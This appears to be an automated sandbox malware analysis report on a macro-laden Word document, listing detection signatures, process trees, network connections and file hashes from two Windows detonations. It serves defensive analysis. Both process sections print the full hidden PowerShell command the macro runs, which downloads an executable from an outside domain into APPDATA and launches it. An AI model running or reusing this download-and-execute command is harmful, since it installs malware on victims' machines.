Malware Analysis Report

2025-01-22 19:12

Sample ID 240720-acxtcsxbnn
Target 5e40ff4f7d71c5d7f15f3658f7f0f3e8_JaffaCakes118
SHA256 caf470ee82450f8c4735002e31f671acf1b6ee335658ef96117f2970645e0f40
Tags
macro macro_on_action execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

caf470ee82450f8c4735002e31f671acf1b6ee335658ef96117f2970645e0f40

Threat Level: Known bad

The file 5e40ff4f7d71c5d7f15f3658f7f0f3e8_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action execution

Process spawned unexpected child process

Blocklisted process makes network request

Office macro that triggers on suspicious action

Command and Scripting Interpreter: PowerShell

Drops file in Windows directory

Office loads VBA resources, possible macro or embedded object present

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-20 00:04

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-20 00:04

Reported

2024-07-20 00:07

Platform

win7-20240704-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5e40ff4f7d71c5d7f15f3658f7f0f3e8_JaffaCakes118.doc"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5e40ff4f7d71c5d7f15f3658f7f0f3e8_JaffaCakes118.doc"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\9bk6.exe') {Remove-Item $env:APPDATA + '\9bk6.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://fast-cargo.com/PAYMENT_details.exe', $env:APPDATA + '\9bk6.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\9bk6.exe'); Stop-Process -Id $Pid -Force

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

Country Destination Domain Proto
US 8.8.8.8:53 fast-cargo.com udp
US 15.197.240.20:80 fast-cargo.com tcp

Files

memory/1884-0-0x000000002F7D1000-0x000000002F7D2000-memory.dmp

memory/1884-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1884-2-0x00000000711ED000-0x00000000711F8000-memory.dmp

memory/1884-7-0x0000000000820000-0x0000000000920000-memory.dmp

memory/1884-6-0x0000000000820000-0x0000000000920000-memory.dmp

memory/1884-5-0x0000000000820000-0x0000000000920000-memory.dmp

memory/1884-10-0x0000000000820000-0x0000000000920000-memory.dmp

memory/1884-15-0x0000000000820000-0x0000000000920000-memory.dmp

memory/1884-14-0x0000000000820000-0x0000000000920000-memory.dmp

memory/1884-11-0x0000000000820000-0x0000000000920000-memory.dmp

memory/1884-12-0x0000000000820000-0x0000000000920000-memory.dmp

memory/1884-9-0x0000000000820000-0x0000000000920000-memory.dmp

memory/1884-8-0x0000000000820000-0x0000000000920000-memory.dmp

memory/1884-27-0x00000000711ED000-0x00000000711F8000-memory.dmp

memory/1884-28-0x0000000000820000-0x0000000000920000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 8e91edc8e9eea09edc2c16e9853af672
SHA1 4e725f5ea832d84991708c93360cdf76a7281cad
SHA256 e76b18f23354ebe1a488326b2d30657ea756f2e6f11abdf4704f7c846c2e3b62
SHA512 37d77c94cf551b23e16dfb2df4c095d68a3c2c68036f50602e427caa10bc658153c30ee64ec24b5b350b59c5364261cc5e448b65ba38857d3d0b8906c1f44d43

memory/1884-43-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1884-44-0x00000000711ED000-0x00000000711F8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-20 00:04

Reported

2024-07-20 00:07

Platform

win10v2004-20240704-en

Max time kernel

143s

Max time network

127s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5e40ff4f7d71c5d7f15f3658f7f0f3e8_JaffaCakes118.doc" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5e40ff4f7d71c5d7f15f3658f7f0f3e8_JaffaCakes118.doc" /o ""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\9bk6.exe') {Remove-Item $env:APPDATA + '\9bk6.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://fast-cargo.com/PAYMENT_details.exe', $env:APPDATA + '\9bk6.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\9bk6.exe'); Stop-Process -Id $Pid -Force

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 fast-cargo.com udp
US 15.197.240.20:80 fast-cargo.com tcp
US 8.8.8.8:53 20.240.197.15.in-addr.arpa udp
US 8.8.8.8:53 174.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.17.209.140:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
GB 173.222.211.24:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 140.209.17.2.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 59.170.16.2.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/1332-0-0x00007FFC1F430000-0x00007FFC1F440000-memory.dmp

memory/1332-1-0x00007FFC1F430000-0x00007FFC1F440000-memory.dmp

memory/1332-2-0x00007FFC1F430000-0x00007FFC1F440000-memory.dmp

memory/1332-3-0x00007FFC1F430000-0x00007FFC1F440000-memory.dmp

memory/1332-4-0x00007FFC5F44D000-0x00007FFC5F44E000-memory.dmp

memory/1332-7-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-6-0x00007FFC1F430000-0x00007FFC1F440000-memory.dmp

memory/1332-5-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-8-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-9-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-10-0x00007FFC1CBF0000-0x00007FFC1CC00000-memory.dmp

memory/1332-11-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-14-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-13-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-15-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-16-0x00007FFC1CBF0000-0x00007FFC1CC00000-memory.dmp

memory/1332-12-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-18-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-17-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-19-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-41-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-47-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-52-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-48-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/2556-53-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/2556-54-0x000001F146D80000-0x000001F146DA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_51pnatms.xzw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\9bk6.exe

MD5 e89f75f918dbdcee28604d4e09dd71d7
SHA1 f9d9055e9878723a12063b47d4a1a5f58c3eb1e9
SHA256 6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023
SHA512 8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 d29962abc88624befc0135579ae485ec
SHA1 e40a6458296ec6a2427bcb280572d023a9862b31
SHA256 a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA512 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

memory/2556-84-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 856d29ed80c98020fb3a982b5bddd602
SHA1 7cef913f0995ef32b56b42c60bcb64e134729183
SHA256 3a189ffef516d41e986efa4977e3a63eac037f47307f3f1ed5f5e42d6f174164
SHA512 6affce071fde9a220c7b859a129ec2fad8d364cb3c74d0582609a187f88252fb8e068a25690e43af7b81778a63a27c7e4c13342d44ffad82261715e500b92f9e

C:\Users\Admin\AppData\Local\Temp\TCDCE36.tmp\sist02.xsl

MD5 f883b260a8d67082ea895c14bf56dd56
SHA1 7954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256 ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512 d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

memory/1332-210-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-211-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-212-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp

memory/1332-230-0x00007FFC1F430000-0x00007FFC1F440000-memory.dmp

memory/1332-231-0x00007FFC1F430000-0x00007FFC1F440000-memory.dmp

memory/1332-233-0x00007FFC1F430000-0x00007FFC1F440000-memory.dmp

memory/1332-232-0x00007FFC1F430000-0x00007FFC1F440000-memory.dmp

memory/1332-234-0x00007FFC5F3B0000-0x00007FFC5F5A5000-memory.dmp